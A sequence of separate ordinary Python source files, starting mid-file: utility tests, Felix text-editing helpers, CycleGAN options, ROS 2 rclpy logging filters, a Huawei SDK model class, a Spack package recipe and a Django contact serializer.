2, 3, 4, 5], [np.nan, np.nan, np.nan, np.nan, np.nan]]) n2 = np.array([[1.1, 2.1, 3.2, 4.1, 5.05], [np.nan, np.nan, np.nan, np.nan, np.nan]]) n1t = np.transpose(n1) n2t = np.transpose(n2) res = vutils.pearsons_mean_corr(n1t, n2t) assert res > 0.999 class TestUtils: def test_delete(self): fileList = ['/tmp/testdir/d1/test1.txt', '/tmp/testdir/d1/d2/test2.txt', '/tmp/testdir/d1/d2/d3/test3.txt', '/tmp/testdir/d1/d2/d3/test4.txt'] for file in fileList: utils.writeFile(file, 'hello', binary=False) # test delete files from list assert os.path.exists(fileList[-1]) utils.deleteFilesFromList(fileList) assert not os.path.exists(fileList[-1]) assert os.path.isdir('/tmp/testdir/d1/d2/d3') # test delete folder for file in fileList: utils.writeFile(file, 'hello', binary=False) utils.deleteFolder('/tmp/testdir/d1') assert not os.path.isdir('/tmp/testdir/d1') # test delete files recursively in folders, but leave folders in place for file in fileList: utils.writeFile(file, 'hello', binary=False) utils.deleteFolderFiles('/tmp/testdir/d1') assert os.path.isdir('/tmp/testdir/d1/d2/d3') class TestAddUser: def test_adduser(self): testPasswordFile = '/tmp/testdir/test_pwd_file' # start with empty file if os.path.exists(testPasswordFile): os.remove(testPasswordFile) addUserPassword('a_user', 'a_password', testPasswordFile, retypePasswd=False) addUserPassword('b_user', 'b_password', testPasswordFile, retypePasswd=False) pwds = loadPasswdFile(testPasswordFile) assert 'a_user' in pwds assert 'b_user' in pwds class TestProjectUtils: def test_npToPy(self): data1 = {'subject': '04', 'task': 'story', 'suffix': 'bold', 'datatype': 'func', 'run': 1} data2 = {'a1': (1, 'two', 3.0), 'a2': {'np': numpy.float32(3), 'pyint': 4, 'str': 'five'}, 'a3': [6.0, 'seven', numpy.int(8), {'a', numpy.float32(5), 'c'}]} data2_py = {'a1': (1, 'two', 3.0), 'a2': {'np': 3.0, 'pyint': 4, 'str': 'five'}, 'a3': [6.0, 'seven', 8.0, {'a', 5.0, 'c'}]} kwargs = {'mdata': data2, 'test1': 9.0, 'test2': numpy.float32(9), 'test3': 'yes'} kwargs_py = {'mdata': data2_py, 'test1': 9.0, 'test2': 9.0, 'test3': 'yes'} args = (4, 'hello', data1, kwargs) args_py = (4, 'hello', data1, kwargs_py) res = putils.npToPy(args) assert res == args_py if __name__ == "__main__": print("PYTEST MAIN:") pytest.main()
# coding=utf-8 # Copyright 2021 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility functions for Felix.""" import json from typing import Callable, Iterator, Mapping, MutableSequence, NamedTuple, Optional, Sequence, Tuple, Union from absl import logging from six import with_metaclass import tensorflow as tf import felix_constants as constants import tokenization FeedDict = Mapping[str, Sequence[Sequence[float]]] SourceTargetPair = Tuple[MutableSequence[str], str] def get_token_list(text): """Returns a list of tokens. This function expects that the tokens in the text are separated by space character(s). Example: "ca n't , touch". This is the case at least for the public DiscoFuse and WikiSplit datasets. Args: text: String to be split into tokens. """ return text.split() def build_feed_dict(tokens, tokenizer, target_tokens = None, max_seq_length = 128, max_predictions_per_seq = 20): """Returns a dictionary used for predicting/training the insertion model. Converts a list of source tokens, containing masks, to a dictionary of features used by a TF model. If a target sequence is provided, then the targets for the MASKs are set. Args: tokens: Input tokens, with mask tokens. tokenizer: Tokenizer used to convert tokens to IDs. target_tokens: (Optional) The targets of the mask tokens. max_seq_length: Maximum sequence length. max_predictions_per_seq: Maximum number of mask tokens. Returns: Dictionary with model features or None if `len(tokens) > max_seq_length` or if the number of MASKs is larger than `max_predictions_per_seq`. """ mask_position = [] mask_target_id = [] mask_target_weight = [] for idx, token in enumerate(tokens): if token != constants.MASK: continue mask_position.append(idx) if target_tokens: mask_target_id += tokenizer.convert_tokens_to_ids([target_tokens[idx]]) else: mask_target_id.append(0) mask_target_weight.append(1.0) # Deleted tokens (bracketed by unused) should have a segment_id of 2. unused = False segment_ids = [] for token in tokens: if token == constants.DELETE_SPAN_START or unused: unused = True segment_ids.append(2) else: segment_ids.append(0) if token == constants.DELETE_SPAN_END: unused = False input_mask = [1] * len(tokens) input_ids = tokenizer.convert_tokens_to_ids(tokens) assert len(segment_ids) == len(input_ids) # Padding. while len(input_ids) < max_seq_length: segment_ids.append(0) input_ids.append(0) input_mask.append(0) if len(input_ids) > max_seq_length: input_ids = input_ids[:max_seq_length] segment_ids = segment_ids[:max_seq_length] input_mask = input_mask[:max_seq_length] #return None assert len(input_ids) == max_seq_length, "len(input_ids) = {}".format( len(input_ids)) assert len(input_mask) == max_seq_length, "len(input_mask) = {}".format( len(input_mask)) assert len(segment_ids) == max_seq_length, "len(segment_ids) = {}".format( len(segment_ids)) if len(mask_position) > max_predictions_per_seq: mask_position = mask_position[:max_predictions_per_seq] #return None while len(mask_position) < max_predictions_per_seq: mask_target_weight.append(0) mask_position.append(0) mask_target_id.append(0) feed_dict = { "input_ids": [input_ids], "input_mask": [input_mask], "segment_ids": [segment_ids], "masked_lm_positions": [mask_position], "masked_lm_ids": [mask_target_id], "masked_lm_weights": [mask_target_weight], } return feed_dict def _int_feature(values): return tf.train.Feature(int64_list=tf.train.Int64List(value=values)) def _float_feature(values): return tf.train.Feature(float_list=tf.train.FloatList(value=values)) def _text_feature(values): return tf.train.Feature( bytes_list=tf.train.BytesList( value=[element.encode("utf8") for element in values])) def feed_dict_to_tf_example(feed_dict, source = None, target = None): """Returns a TF example for MLM insertion model.""" features = { "input_ids": _int_feature(feed_dict["input_ids"][0]), "input_mask": _int_feature(feed_dict["input_mask"][0]), "segment_ids": _int_feature(feed_dict["segment_ids"][0]), "masked_lm_positions": _int_feature(feed_dict["masked_lm_positions"][0]), "masked_lm_ids": _int_feature(feed_dict["masked_lm_ids"][0]), "masked_lm_weights": _float_feature(feed_dict["masked_lm_weights"][0]), } if source: features["text_source"] = _text_feature([source]) if target: features["text_target"] = _text_feature([target]) return tf.train.Example(features=tf.train.Features(feature=features)) class Features(NamedTuple): """A data holder for various features that can be read from files.""" source: MutableSequence[str] target: str output_variant_id: Optional[int] = None @staticmethod def from_source_target_pair(pair): return Features(source=pair[0], target=pair[1]) SourcesAndFeaturesPair = Tuple[MutableSequence[str], Features] def text_file_iterator(fname_pattern): """Returns an iterator over lines of the files covered by fname_pattern.""" for fname in get_filenames(fname_pattern): with tf.io.gfile.GFile(fname, "r") as f: for line in f: yield line def skip_header_text_file_iterator(fname_pattern): """Similar to text_file_iterator, but skipping the first line of each file.""" for fname in get_filenames(fname_pattern): tf.io.gfile.GFile(fname) it = tf.io.gfile.GFile(fname, "r") it.next() # skip the header line for line in it: yield line def get_parse_tsv_line_fn( return_none_on_error = False, reverse = False): """A higher-order function producing TSV line-parsing functions. Args: return_none_on_error: Whether to return None on encountering an error (such as too few TSV columns) rather than raising an Error. reverse: When True, returns ([`target`], `source`) instead of ([`source`], `target`). Useful for working with "reverse" (a.k.a. "noise" models that go from `target` to `source`. Returns: A parsing function that goes from a text line to a ([source], target) pair (or a ([`target`], `source`) pair when `reverse`=True). """ def parse_tsv_line(line): """Parses the first two columns, `source` and `target`, from a TSV line. Any further columns are ignored. Args: line: A text line. Returns: a tuple ([source], target), with `source` being wrapped in a list. Raises: ValueError: when the line has less than two TSV columns and `return_none_on_error`=False. """ split = line.rstrip("\n").split("\t") if len(split) < 2: message = 'TSV line has less than two tab-delimited fields:\n"{}"'.format( line) if return_none_on_error: logging.warning(message) return None else: raise ValueError(message) source, target = split[:2] if reverse: return [target], source else: return [source], target return parse_tsv_line def parse_discofuse_line(line): """Parses a DiscoFuse example from a line from a TSV file. The documentation for this format: https://github.com/google-research-datasets/discofuse#data-format Args: line: A line from a TSV file. Returns: A pair (<source texts list>, <target text>). """ coherent_1, coherent_2, incoherent_1, incoherent_2, _, _, _, _ = ( line.rstrip("\n").split("\t")) # Strip because the second coherent sentence might be empty. fusion = (coherent_1 + " " + coherent_2).strip() return [incoherent_1, incoherent_2], fusion def parse_iterate_plain_line(line): return _parse_iterate_line(line, with_intent=False) def parse_iterate_intent_line(line): return _parse_iterate_line(line, with_intent=True) def _parse_iterate_line(line, with_intent=False): """Parses a IteraTE example from a line from a (line-by-line) JSON file. Args: line: A JSON line from a line-by-line JSON file. Returns: A tuple ([source], target), with `source` being wrapped in a list. """ json_line = json.loads(line) if with_intent: src = json_line["before_sent_with_intent"] else: src = json_line["before_sent"] tgt = json_line["after_sent"] return [src], tgt def yield_sources_and_targets( input_file_pattern, input_format, source_key = None, target_key = None): """Produces an iterator over pairs (source list, targets) parsed from a file. Args: input_file_pattern: Path/pattern to the input file(s). input_format: Format of the input file. source_key: Source text feature name. Only considered when `input_format=sstable`. target_key: Target text feature name. Only considered when `input_format=sstable`. Yields: Pairs of (list of source texts, target text). """ data_spec = { "wikisplit": (text_file_iterator, get_parse_tsv_line_fn()), "discofuse": (skip_header_text_file_iterator, parse_discofuse_line), "IteraTE_Plain": (skip_header_text_file_iterator, parse_iterate_plain_line), "IteraTE_Intent": (skip_header_text_file_iterator, parse_iterate_intent_line), } if input_format not in data_spec: raise ValueError("Unsupported input_format: {}".format(input_format)) file_iterator_fn, parse_fn = data_spec[input_format] for item in file_iterator_fn(input_file_pattern): # Pytype correctly infers possible types for `item`, but does not handle # well the various possible signatures of `parse_fn`. parsed_item = parse_fn(item) # pytype: disable=wrong-arg-types if parsed_item is not None: yield parsed_item def get_filenames(patterns): """Obtains a list of filenames corresponding to the pattern. Supports patterns, as well as plain file names, as well as comma-separated lists of patterns. Caveat: Will not work if the patterns have commas (',') in them. Args: patterns: File pattern or comma-separated patterns. Raises: RuntimeError: If `patterns` is valid but cannot be expanded/does not match any files. Returns: list of individual paths to each file. """ all_files = [] for pattern in patterns.split(","): # points to a specific file. files = tf.io.gfile.glob(pattern) if not files: raise RuntimeError("Could not find files matching: %s" % pattern) all_files.extend(files) return all_files def read_label_map( path, use_str_keys = False): """Returns label map read from the given path. Args: path: Path to the label map file. use_str_keys: Whether to use label strings as keys instead of (base tag, num insertions) tuple keys. The latter is only used by FelixInsert. """ label_map = {} with tf.io.gfile.GFile(path) as f: if path.endswith(".json"): label_map = json.load(f) else: for tag in f: tag = tag.strip() # Empty lines are skipped. if tag: if tag in label_map: raise ValueError("Duplicate label in label_map: {}".format(tag)) label_map[tag] = len(label_map) if not use_str_keys: new_label_map = {} for key, val in label_map.items(): if "|" in key: pos_pipe = key.index("|") new_key = (key[:pos_pipe], int(key[pos_pipe + 1:])) else: new_key = (key, 0) new_label_map[new_key] = val label_map = new_label_map return label_map
import argparse import os from util import util import torch import models import data class BaseOptions(): """This class defines options used during both training and test time. It also implements several helper functions such as parsing, printing, and saving the options. It also gathers additional options defined in <modify_commandline_options> functions in both dataset class and model class. """ def __init__(self): """Reset the class; indicates the class hasn't been initailized""" self.initialized = False def initialize(self, parser): """Define the common options that are used in both training and test.""" # basic parameters parser.add_argument('--dataroot', required=True, help='path to images (should have subfolders trainA, trainB, valA, valB, etc)') parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models') parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU') parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here') # model parameters parser.add_argument('--model', type=str, default='cycle_gan', help='chooses which model to use. [cycle_gan | pix2pix | test | colorization]') parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels: 3 for RGB and 1 for grayscale') parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels: 3 for RGB and 1 for grayscale') parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in the last conv layer') parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in the first conv layer') parser.add_argument('--netD', type=str, default='basic', help='specify discriminator architecture [basic | n_layers | pixel]. The basic model is a 70x70 PatchGAN. n_layers allows you to specify the layers in the discriminator') parser.add_argument('--netG', type=str, default='resnet_9blocks', help='specify generator architecture [resnet_9blocks | resnet_6blocks | unet_256 | unet_128]') parser.add_argument('--n_layers_D', type=int, default=3, help='only used if netD==n_layers') parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization [instance | batch | none]') parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]') parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.') parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator') parser.add_argument('--conv_type', type=str, default='conv2d', help='conv type [conv2d | dcn_v1 | dcn_v2 | mixed]') # dataset parameters parser.add_argument('--dataset_mode', type=str, default='unaligned', help='chooses how datasets are loaded. [unaligned | aligned | single | colorization]') parser.add_argument('--direction', type=str, default='AtoB', help='AtoB or BtoA') parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly') parser.add_argument('--num_threads', default=4, type=int, help='# threads for loading data') parser.add_argument('--batch_size', type=int, default=1, help='input batch size') parser.add_argument('--load_size', type=int, default=286, help='scale images to this size') parser.add_argument('--crop_size', type=int, default=256, help='then crop to this size') parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.') parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]') parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation') parser.add_argument('--display_winsize', type=int, default=256, help='display window size for both visdom and HTML') # additional parameters parser.add_argument('--epoch', type=str, default='latest', help='which epoch to load? set to latest to use latest cached model') parser.add_argument('--load_iter', type=int, default='0', help='which iteration to load? if load_iter > 0, the code will load models by iter_[load_iter]; otherwise, the code will load models by [epoch]') parser.add_argument('--verbose', action='store_true', help='if specified, print more debugging information') parser.add_argument('--suffix', default='', type=str, help='customized suffix: opt.name = opt.name + suffix: e.g., {model}_{netG}_size{load_size}') self.initialized = True return parser def gather_options(self): """Initialize our parser with basic options(only once). Add additional model-specific and dataset-specific options. These options are defined in the <modify_commandline_options> function in model and dataset classes. """ if not self.initialized: # check if it has been initialized parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser = self.initialize(parser) # get the basic options opt, _ = parser.parse_known_args() # modify model-related parser options model_name = opt.model model_option_setter = models.get_option_setter(model_name) parser = model_option_setter(parser, self.isTrain) opt, _ = parser.parse_known_args() # parse again with new defaults # modify dataset-related parser options dataset_name = opt.dataset_mode dataset_option_setter = data.get_option_setter(dataset_name) parser = dataset_option_setter(parser, self.isTrain) # save and return the parser self.parser = parser return parser.parse_args() def print_options(self, opt): """Print and save options It will print both current options and default values(if different). It will save options into a text file / [checkpoints_dir] / opt.txt """ message = '' message += '----------------- Options ---------------\n' for k, v in sorted(vars(opt).items()): comment = '' default = self.parser.get_default(k) if v != default: comment = '\t[default: %s]' % str(default) message += '{:>25}: {:<30}{}\n'.format(str(k), str(v), comment) message += '----------------- End -------------------' print(message) # save to the disk expr_dir = os.path.join(opt.checkpoints_dir, opt.name) util.mkdirs(expr_dir) file_name = os.path.join(expr_dir, '{}_opt.txt'.format(opt.phase)) with open(file_name, 'wt') as opt_file: opt_file.write(message) opt_file.write('\n') def parse(self): """Parse our options, create checkpoints directory suffix, and set up gpu device.""" opt = self.gather_options() opt.isTrain = self.isTrain # train or test # process opt.suffix if opt.suffix: suffix = ('_' + opt.suffix.format(**vars(opt))) if opt.suffix != '' else '' opt.name = opt.name + suffix self.print_options(opt) # set gpu ids str_ids = opt.gpu_ids.split(',') opt.gpu_ids = [] for str_id in str_ids: id = int(str_id) if id >= 0: opt.gpu_ids.append(id) if len(opt.gpu_ids) > 0: torch.cuda.set_device(opt.gpu_ids[0]) self.opt = opt return self.opt
# Copyright 2017 Open Source Robotics Foundation, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from collections import namedtuple from collections import OrderedDict import inspect import os from rclpy.clock import Clock from rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy # Known filenames from which logging methods can be called (will be ignored in `_find_caller`). _internal_callers = [] # This will cause rclpy filenames to be registered in `_internal_callers` on first logging call. _populate_internal_callers = True def _find_caller(frame): """Get the first calling frame that is outside of rclpy.""" global _populate_internal_callers global _internal_callers if _populate_internal_callers: # Populate the list of internal filenames from which logging methods can be called. # This has to be done from within a function to avoid cyclic module imports. import rclpy.logging # Extend the list to preserve any filenames that may have been added by third parties. # Note: the call to `realpath` will also resolve mixed slashes that can result on Windows. _internal_callers.extend([ os.path.realpath(__file__), os.path.realpath(rclpy.logging.__file__), ]) _populate_internal_callers = False file_path = os.path.realpath(inspect.getframeinfo(frame).filename) while any(f in file_path for f in _internal_callers): frame = frame.f_back file_path = os.path.realpath(inspect.getframeinfo(frame).filename) return frame class CallerId( namedtuple('CallerId', ['function_name', 'file_path', 'line_number', 'last_index'])): def __new__(cls, frame=None): if not frame: frame = _find_caller(inspect.currentframe()) return super(CallerId, cls).__new__( cls, function_name=frame.f_code.co_name, file_path=os.path.abspath(inspect.getframeinfo(frame).filename), line_number=frame.f_lineno, last_index=frame.f_lasti, # To distinguish between two callers on the same line ) class LoggingFilter: """Base class for logging filters.""" """ Parameters of a filter and their default value, if appropriate. A default value of None makes a parameter required. """ params = {} """ Initialize the context of a logging call, e.g. declare variables needed for determining the log condition and add them to the context. """ @classmethod def initialize_context(cls, context, **kwargs): # Store all parameters in the context so we can check that users never try to change them. for param in cls.params: context[param] = kwargs.get(param, cls.params[param]) if context[param] is None: raise TypeError( 'Required parameter "{0}" was not specified for logging filter "{1}"' .format(param, cls.__name__)) """ Decide if it's appropriate to log given a context, and update the context accordingly. """ @staticmethod def should_log(context): return True class Once(LoggingFilter): """Ignore all log calls except the first one.""" params = { 'once': None, } @classmethod def initialize_context(cls, context, **kwargs): super(Once, cls).initialize_context(context, **kwargs) context['has_been_logged_once'] = False @staticmethod def should_log(context): logging_condition = False if not context['has_been_logged_once']: logging_condition = True context['has_been_logged_once'] = True return logging_condition class Throttle(LoggingFilter): """Ignore log calls if the last call is not longer ago than the specified duration.""" params = { 'throttle_duration_sec': None, 'throttle_time_source_type': Clock(), } @classmethod def initialize_context(cls, context, **kwargs): super(Throttle, cls).initialize_context(context, **kwargs) context['throttle_last_logged'] = 0 if not isinstance(context['throttle_time_source_type'], Clock): raise ValueError( 'Received throttle_time_source_type of "{0}" ' 'is not a clock instance' .format(context['throttle_time_source_type'])) @staticmethod def should_log(context): logging_condition = True now = context['throttle_time_source_type'].now().nanoseconds next_log_time = context['throttle_last_logged'] + (context['throttle_duration_sec'] * 1e+9) logging_condition = now >= next_log_time if logging_condition: context['throttle_last_logged'] = now return logging_condition class SkipFirst(LoggingFilter): """Ignore the first log call but process all subsequent calls.""" params = { 'skip_first': None, } @classmethod def initialize_context(cls, context, **kwargs): super(SkipFirst, cls).initialize_context(context, **kwargs) context['first_has_been_skipped'] = False @staticmethod def should_log(context): logging_condition = True if not context['first_has_been_skipped']: logging_condition = False context['first_has_been_skipped'] = True return logging_condition # The ordering of this dictionary defines the order in which filters will be processed. supported_filters = OrderedDict() supported_filters['throttle'] = Throttle supported_filters['skip_first'] = SkipFirst supported_filters['once'] = Once def get_filters_from_kwargs(**kwargs): """ Determine which filters have had parameters specified in the given keyword arguments. Returns the list of filters using the order specified by `supported_filters`. """ detected_filters = [] all_supported_params = [] for supported_filter, filter_class in supported_filters.items(): filter_params = filter_class.params.keys() all_supported_params.extend(filter_params) if any(kwargs.get(param_name) for param_name in filter_params): detected_filters.append(supported_filter) # Check that all required parameters (with no default value) have been specified for detected_filter in detected_filters: for param_name, default_value in supported_filters[detected_filter].params.items(): if param_name in kwargs: continue # Param not specified; use the default. if default_value is None: raise TypeError( 'required parameter "{0}" not specified ' 'but is required for the the logging filter "{1}"'.format( param_name, detected_filter)) kwargs[param_name] = default_value for kwarg in kwargs: if kwarg not in all_supported_params: raise TypeError( 'parameter "{0}" is not one of the recognized logging options "{1}"' .format(kwarg, all_supported_params) ) return detected_filters class RcutilsLogger: def __init__(self, name=''): self.name = name self.contexts = {} def get_child(self, name): if not name: raise ValueError('Child logger name must not be empty.') if self.name: # Prepend the name of this logger name = self.name + '.' + name return RcutilsLogger(name=name) def set_level(self, level): from rclpy.logging import LoggingSeverity level = LoggingSeverity(level) return _rclpy.rclpy_logging_set_logger_level(self.name, level) def get_effective_level(self): from rclpy.logging import LoggingSeverity level = LoggingSeverity( _rclpy.rclpy_logging_get_logger_effective_level(self.name)) return level def is_enabled_for(self, severity): from rclpy.logging import LoggingSeverity severity = LoggingSeverity(severity) return _rclpy.rclpy_logging_logger_is_enabled_for(self.name, severity) def log(self, message, severity, **kwargs): r""" Log a message with the specified severity. The message will not be logged if: * the logger is not enabled for the message's severity (the message severity is less than the level of the logger), or * a logging filter causes the message to be skipped. .. note:: Logging filters will only be evaluated if the logger is enabled for the message's severity. :param message str: message to log. :param severity: severity of the message. :type severity: :py:class:LoggingSeverity :keyword name str: name of the logger to use. :param \**kwargs: optional parameters for logging filters (see below). :Keyword Arguments: * *throttle_duration_sec* (``float``) -- Duration of the throttle interval for the :py:class:Throttle: filter. * *throttle_time_source_type* (``str``) -- Optional time source type for the :py:class:Throttle: filter (default of ``RCUTILS_STEADY_TIME``) * *skip_first* (``bool``) -- If True, enable the :py:class:SkipFirst: filter. * *once* (``bool``) -- If True, enable the :py:class:Once: filter. :returns: False if a filter caused the message to not be logged; True otherwise. :raises: TypeError on invalid filter parameter combinations. :raises: ValueError on invalid parameters values. :rtype: bool """ # Gather context info and check filters only if the severity is appropriate. if not self.is_enabled_for(severity): return False from rclpy.logging import LoggingSeverity severity = LoggingSeverity(severity) name = kwargs.pop('name', self.name) # Infer the requested log filters from the keyword arguments detected_filters = get_filters_from_kwargs(**kwargs) # Get/prepare the context corresponding to the caller. caller_id = CallerId() if caller_id not in self.contexts: context = {'name': name, 'severity': severity} for detected_filter in detected_filters: if detected_filter in supported_filters: supported_filters[detected_filter].initialize_context(context, **kwargs) context['filters'] = detected_filters self.contexts[caller_id] = context else: context = self.contexts[caller_id] # Don't support any changes to the logger. if severity != context['severity']: raise ValueError('Logger severity cannot be changed between calls.') if name != context['name']: raise ValueError('Logger name cannot be changed between calls.') if detected_filters != context['filters']: raise ValueError('Requested logging filters cannot be changed between calls.') for detected_filter in detected_filters: filter_params = supported_filters[detected_filter].params if any(context[p] != kwargs.get(p, filter_params[p]) for p in filter_params): raise ValueError( 'Logging filter parameters cannot be changed between calls.') # Check if any filter determines the message shouldn't be processed. # Note(dhood): even if a message doesn't get logged, a filter might still update its state # as if it had been. This matches the behavior of the C logging macros provided by rcutils. for logging_filter in context['filters']: if not supported_filters[logging_filter].should_log(context): return False # Call the relevant function from the C extension. _rclpy.rclpy_logging_rcutils_log( severity, name, message, caller_id.function_name, caller_id.file_path, caller_id.line_number) return True def debug(self, message, **kwargs): """Log a message with `DEBUG` severity via :py:classmethod:RcutilsLogger.log:.""" from rclpy.logging import LoggingSeverity return self.log(message, LoggingSeverity.DEBUG, **kwargs) def info(self, message, **kwargs): """Log a message with `INFO` severity via :py:classmethod:RcutilsLogger.log:.""" from rclpy.logging import LoggingSeverity return self.log(message, LoggingSeverity.INFO, **kwargs) def warning(self, message, **kwargs): """Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:.""" from rclpy.logging import LoggingSeverity return self.log(message, LoggingSeverity.WARN, **kwargs) def warn(self, message, **kwargs): """ Log a message with `WARN` severity via :py:classmethod:RcutilsLogger.log:. Deprecated in favor of :py:classmethod:RcutilsLogger.warning:. """ return self.warning(message, **kwargs) def error(self, message, **kwargs): """Log a message with `ERROR` severity via :py:classmethod:RcutilsLogger.log:.""" from rclpy.logging import LoggingSeverity return self.log(message, LoggingSeverity.ERROR, **kwargs) def fatal(self, message, **kwargs): """Log a message with `FATAL` severity via :py:classmethod:RcutilsLogger.log:.""" from rclpy.logging import LoggingSeverity return self.log(message, LoggingSeverity.FATAL, **kwargs)
def escreva(txt): vzs = int(len(txt)) + 2 print('~' * vzs) print(f' {txt} ') print('~' * vzs) escreva('Ian Stigliano') escreva('Aprenda Python') escreva('Curso em Python do Guanabara') escreva('Ian')
# coding: utf-8 import pprint import re import six class ImageDetectionResultDetailPolitics: """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ sensitive_list = [] openapi_types = { 'confidence': 'float', 'label': 'str', 'face_detail': 'ImageDetectionResultDetailFaceDetail' } attribute_map = { 'confidence': 'confidence', 'label': 'label', 'face_detail': 'face_detail' } def __init__(self, confidence=None, label=None, face_detail=None): """ImageDetectionResultDetailPolitics - a model defined in huaweicloud sdk""" self._confidence = None self._label = None self._face_detail = None self.discriminator = None if confidence is not None: self.confidence = confidence if label is not None: self.label = label if face_detail is not None: self.face_detail = face_detail @property def confidence(self): """Gets the confidence of this ImageDetectionResultDetailPolitics. :return: The confidence of this ImageDetectionResultDetailPolitics. :rtype: float """ return self._confidence @confidence.setter def confidence(self, confidence): """Sets the confidence of this ImageDetectionResultDetailPolitics. :param confidence: The confidence of this ImageDetectionResultDetailPolitics. :type: float """ self._confidence = confidence @property def label(self): """Gets the label of this ImageDetectionResultDetailPolitics. :return: The label of this ImageDetectionResultDetailPolitics. :rtype: str """ return self._label @label.setter def label(self, label): """Sets the label of this ImageDetectionResultDetailPolitics. :param label: The label of this ImageDetectionResultDetailPolitics. :type: str """ self._label = label @property def face_detail(self): """Gets the face_detail of this ImageDetectionResultDetailPolitics. :return: The face_detail of this ImageDetectionResultDetailPolitics. :rtype: ImageDetectionResultDetailFaceDetail """ return self._face_detail @face_detail.setter def face_detail(self, face_detail): """Sets the face_detail of this ImageDetectionResultDetailPolitics. :param face_detail: The face_detail of this ImageDetectionResultDetailPolitics. :type: ImageDetectionResultDetailFaceDetail """ self._face_detail = face_detail def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: if attr in self.sensitive_list: result[attr] = "****" else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ImageDetectionResultDetailPolitics): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class RTfmpvalue(RPackage): """In putative Transcription Factor Binding Sites (TFBSs) identification from sequence/alignments, we are interested in the significance of certain match score. TFMPvalue provides the accurate calculation of P-value with score threshold for Position Weight Matrices, or the score with given P-value. This package is an interface to code originally made available by Helene Touzet and Jean-Stephane Varre, 2007, Algorithms Mol Biol:2, 15.""" homepage = "https://github.com/ge11232002/TFMPvalue" url = "https://cran.rstudio.com/src/contrib/TFMPvalue_0.0.6.tar.gz" list_url = "https://cran.rstudio.com/src/contrib/Archive/TFMPvalue" version('0.0.6', '69fdf4f9b9a0f408a5cee9ce34bea261') depends_on('[email protected]:', type=('build', 'run'))
https://forms.gle/3jisA75mp56U2F4L6 https://docs.google.com/spreadsheets/d/e/2PACX-1vTUSn1L4ChdUQeJSx2ufan1h9AhHzKEqPwBZwYmigstcfylLoxdn50Ndz_SF1cSwKFAD9Pw1rPEfo6t/pubhtml
""" Contact serializers. """ # Django REST Framework from ast import Num from statistics import mode from rest_framework import serializers # Models from coeadmin.record.models.person import Person from coeadmin.record.models.contact import Contact # Serializers from coeadmin.record.serializers.person import PersonModelSerializer # Utilities from datetime import datetime, timedelta class ContactModelSerializer(serializers.ModelSerializer): """ Contact serializer. """ person = PersonModelSerializer(allow_null=True) class Meta: """ Meta class. """ model = Contact fields = ( 'id', 'person', 'contact_date', 'contact_type', 'insolation_days', 'high_insulation_date', 'is_active', ) read_only_fields = ( 'id', 'person' ) class AddContactSerializer(serializers.ModelSerializer): """ Add contact serializer. """ class Meta: """ Meta class. """ model = Contact fields = ( 'id', 'person', 'contact_date', 'contact_type', 'insolation_days', 'high_insulation_date', 'is_active', ) def create(self, validate_data): """ Create the contact. """ positive = self.context['positive'] person = validate_data['person'] days = validate_data['insolation_days'] contact_date= validate_data['contact_date'], contact = Contact.objects.create( positive=positive, person=person, contact_date= validate_data['contact_date'], contact_type= validate_data['contact_type'], insolation_days=days, high_insulation_date=contact_date[0] + timedelta(days=days), ) return contact
